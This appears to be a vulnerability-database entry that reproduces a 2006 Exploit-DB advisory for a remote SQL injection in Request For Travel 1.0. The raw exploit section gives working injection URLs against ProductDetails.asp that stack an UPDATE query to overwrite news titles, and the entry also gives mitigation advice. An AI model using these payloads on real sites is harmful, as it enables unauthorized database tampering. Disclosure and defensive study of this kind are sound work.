Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability

vendor:

Request For Travel 1.0 (product)

by:

ajann

CVSS

HIGH

SQL Injection

CWE

Product Name: Request For Travel 1.0 (product)

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Request For Travel 1.0 (product). An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, modify data, or execute system level commands.

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

*************************************************************************************
# Title   :  Request For Travel 1.0 (product) | Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(
# $$$     :  $8,000

*************************************************************************************


[[SQL]]]

###http://[target]/[path]//ProductDetails.asp=[SQL]

Example:
-> All News Title Changed to = "kro"

//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'--

-> Just NewsId Title Changed to = "kro"
//ProductDetails.asp?from=desc&mod=region&CID=-1&RID=-1&PID=-1;update%20gtsNews%20set%20NewsTitle='kro'%20where%20NewsID=2--

[[/SQL]]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]